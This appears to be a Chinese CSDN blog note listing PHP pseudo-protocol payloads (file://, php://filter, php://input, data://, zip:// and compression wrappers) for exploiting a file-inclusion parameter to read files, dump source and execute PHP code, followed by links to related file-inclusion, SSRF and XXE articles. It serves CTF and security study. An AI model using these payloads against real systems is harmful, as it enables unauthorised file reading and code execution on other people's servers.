利用伪协议实现命令执行

最新推荐文章于 2024-04-14 05:15:00 发布
最新推荐文章于 2024-04-14 05:15:00 发布
阅读量267 收藏 1
点赞数 1
分类专栏: 笔记 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53498616/article/details/114227954
版权 
访问本地文件:
?c=file://[文件绝对路径]
文件源码读取:
?c=php://filter/read=convert.base64-encode/resource=[文件名]
php代码执行:
?c=php://input  再经过POST请求执行命令
?c=data://text/plain,[php代码]
?c=data://text/plain;base64,[base64加密后的代码]
访问压缩文件中的子文件:
?c=zip://[压缩文件绝对路径]#[压缩文件内的子文件名]
//下面两种用于.zip无法直接上传而命名为.jpg时
?c=compress.bzip2://[压缩文件绝对路径或相对路径]
?c=compress.zlib://[压缩文件绝对路径或相对路径]
Ryuuz4k1
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP协议实现命令执行
Huamang的博客
12-01 292
PHP协议实现命令执行 转载于https://www.freebuf.com/column/148886.html 首先归纳下常见的文件包含函数:include、require、include_once、require_once、highlight_file 、show_source 、readfile 、file_get_contents 、fopen 、file,计划对文件包含漏洞与php封装协议利用方法进行总结,本篇先总结下一些封装协议,涉及的相关协议:file://、php://filter、p
PHP协议
m0_75178803的博客
04-02 1171
可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行,从而导致任意文件读取协议参数:常用的有。
php 读取本地文件
qq_27487739的博客
05-15 2652
函数:使用文件指针读取文件的内容(可以逐行读取或读取指定字节数量的数据)。函数读取指定文件的内容,并将每一行存储在。函数:读取整个文件并将其作为字符串返回。每一行的结尾都会包含一个换行符。函数返回指定文件的内容,并将其存储在。函数打开指定文件,并将文件指针存储在。指针所指向的文件的内容,并将其存储在。如果你想逐行读取文件的内容,可以使用。函数读取文件的内容,并将其存储在。如果遇到文件结束符,则。在上面的示例中,我们首先使用。函数:将文件内容读入数组。在上面的示例中,我们使用。函数关闭打开的文件。
PHP中的文件处理:PHP 读取文件
最新发布
新华编程特战队
04-14 974
无论是读取纯文本文件、CSV 文件、JSON 文件还是 XML 文件,PHP 都提供了强大的解决方案来提取和操作其中的信息。在 PHP 中读取文件涉及打开文件、读取其内容并根据获得的数据执行操作。在此示例中,使用 readfile() 读取文件“example.txt”,读取的字节数存储在 $bytesRead 变量中。通过打开文件并使用适当的功能,开发人员可以读取文本文件、CSV 文件、JSON 文件等的内容。在 PHP 中读取文件是一项基本操作,它允许开发人员访问和提取存储在文件中的数据。
任意文件读取及漏洞复现
来日可期的博客
08-31 3376
任意文件上传漏洞指的是攻击者可以通过绕过应用程序的文件上传功能,向服务器上传恶意文件,包括脚本文件、木马程序等,从而执行任意代码或获取系统敏感信息。
php协议.pdfphp协议.pdfphp协议.pdf
02-24
PHP 协议是一种特殊的 URL 格式,用于在 PHP 代码中执行特定的操作。这些协议主要用于处理文件读取、网络请求以及数据处理等方面。理解并恰当地使用 PHP 协议对于开发安全、高效的 PHP 应用程序至关重要。 ##...
TCPIP协议详解卷2:实现
07-26
TCPIP协议详解卷2:实现 pdf版,有目录,完美阅读体验。 中文书名:TCP/IP详解 卷2:实现 英文书名:TCP/IP Illustrated, Volume 2: The Implementation 作者:(美) Gary R. Wright ,W. Richard Stevens 译者:陆...
ICMP.rar_ICMP的实现过程_icmp
09-22
**ICMP协议实现过程**大致分为以下几个步骤: 1. **生成ICMP报文**:当网络中发生特定情况(如数据包无法到达目的地)时,源或目标主机的网络层会生成一个ICMP报文,填充相应的类型、代码和可能的数据。 2. **...
Telnet 命令 详解.pdf
08-29
- **远程会话**:一旦认证成功,用户就可以开始与远程主机的交互,执行各种命令和服务,就好像直接坐在远程主机前一样。 #### 三、Telnet协议的技术细节 Telnet协议采用了多种技术来实现远程登录,包括但不限于: ...
金山WPS Mail邮件客户端远程命令执行漏洞(Mozilla系XUL程序利用技巧) _ 乌云漏洞库,乌云镜像站, WooYun
08-03
一旦攻击者成功触发这个XSS(跨站脚本)漏洞,他们可以利用Thunderbird的特定协议处理机制,如`imap`和`mailbox`协议,进一步扩大攻击范围。`imap`协议常用于访问IMAP服务器上的邮件,而`mailbox`则用于处理POP...
php协议实现命令执行,任意文件读取
qq_44418229的博客
06-09 6427
ctf----php协议
php任意文件读取
不忘初心,护天下安全!
08-13 525
php://filter/read=convert.base64-encode/resource=index.php
ssrf总结
weixin_44576725的博客
05-01 1724
SSRF总结 简介 服务端请求造(Server Side Request Forgery, SSRF)指的是攻击者在未能取得服务器所有权限时,利用服务器漏洞以服务器的身份发送一条构造好的请求给服务器所在内网。SSRF攻击通常针对外部网络无法直接访问的内部系统。SSRF可以对外网、服务器所在内网、本地进行端口扫描,攻击运行在内网或本地的应用,或者利用File协议读取本地文件。 原理 SSRF漏洞形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。例如,黑客操作服务端从
php协议任意文件读取
weixin_33763244的博客
06-11 1280
php://filter/read=convert.base64-encode/resource=index.php 转载于:https://www.cnblogs.com/iAmSoScArEd/p/10575939.html
php协议实现命令执行的七种姿势
大方子
09-06 1592
文件包含函数:include、require、include_once、require_once、highlight_file 、show_source 、readfile 、file_get_contents 、fopen 、file 。 首先归纳下常见的文件包含函数:include、require、include_once、require_once、highlight_file 、show_...
php协议实现命令执行
鱼开yk2的博客
10-09 602
单纯的从URL判断的话,URL中path、dir、file、pag、page、archive、p、eng、语言文件等相关关键字眼的时候,可能存在文件包含漏洞 航舰的文件包含函数: include require include_once hightlight_file show_sourcce readfile file_get_contents fopen file 封装协议: file:...
PHP代码审计基础:任意文件读取及删除漏洞
1匹黑马
12-03 1182
文章目录任意文件读取危害挖掘思路测试代码任意文件删除危害 任意文件读取 通过提交专门设计的 输入,攻击者就可以在被访问的文件系统中读取或写入任意内容,往往能够使攻击者从服务器上获取敏感文件,正常读取的文件没有经过校验或者校验不严格,用户可以控制这个变量或者变量读取任意文件 危害 任意文件读取,是Web安全中的高危漏洞,它可以泄露源码,数据库配置文件等等,导致网站处于极度不安全的状态 挖掘思路 fopen() file_get_contents() fread() fgets() fgetss()
任意文件读取下载漏洞
热门推荐
u011215939的博客
12-19 1万+
任意文件读取下载漏洞漏洞原理
配合php协议利用文件包含漏洞
超人学飞的日子
06-06 9205
php支持多种封装协议,这些协议常被CTF出题中与文件包含漏洞结合,这里做个小总结。实验用的是DVWA平台,low级别,phpstudy中的设置为5.4.45版本,设置allow_url_fopen和allow_url_include都为On.index.phpindex.php同级目录下有mytest001.txt ,mytest002.txt ,mytest003.zip(其中包含mytest...
在pikachu靶场平台利用XXE漏洞调用except协议调用系统命令执行系统命令
05-23
接下来,我们需要利用XXE漏洞调用except协议执行系统命令。except协议是一种在XML文档中嵌入任意数据的方法,它的语法如下: ``` <!ENTITY name SYSTEM "file:///path/to/file"> ``` 其中name为实体名称,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值